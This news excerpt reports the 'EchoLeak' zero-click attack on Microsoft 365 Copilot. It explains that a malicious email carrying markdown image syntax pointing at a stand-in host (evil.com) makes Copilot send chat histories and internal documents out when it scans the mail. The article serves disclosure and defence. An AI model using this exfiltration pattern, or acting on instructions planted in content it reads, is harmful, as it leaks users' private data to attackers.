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    First-ever zero-click attack targets Microsoft 365 Copilot

    TechurzBy TechurzJune 12, 2025No Comments1 Min Read
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    Dhaka, Bangladesh - 27 December 2023: Hand holding a phone with Microsoft Copilot AI chatbot. Microsoft Copilot is a chatbot developed by Microsoft
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    “This is sheer weaponization of AI’s core strength, contextual understanding, against itself,” said Abhishek Anant Garg, an analyst at QKS Group. “Enterprise security struggles because it’s built for malicious code, not language that looks harmless but acts like a weapon.”

    This kind of vulnerability represents a significant threat, warned Nader Henein, VP Analyst at Gartner. “Given the complexity of AI assistants and RAG-based services, it’s definitely not the last we’ll see.”

    EchoLeak’s exploit mechanism

    EchoLeak exploits Copilot’s ability to handle both trusted internal data (like emails, Teams chats, and OneDrive files) and untrusted external inputs, such as inbound emails. The attack begins with a malicious email containing specific markdown syntax, “like ![Image alt text][ref] [ref]: https://www.evil.com?param=.” When Copilot automatically scans the email in the background to prepare for user queries, it triggers a browser request that sends sensitive data, such as chat histories, user details, or internal documents, to an attacker’s server.

    Attack Copilot firstever Microsoft targets zeroclick
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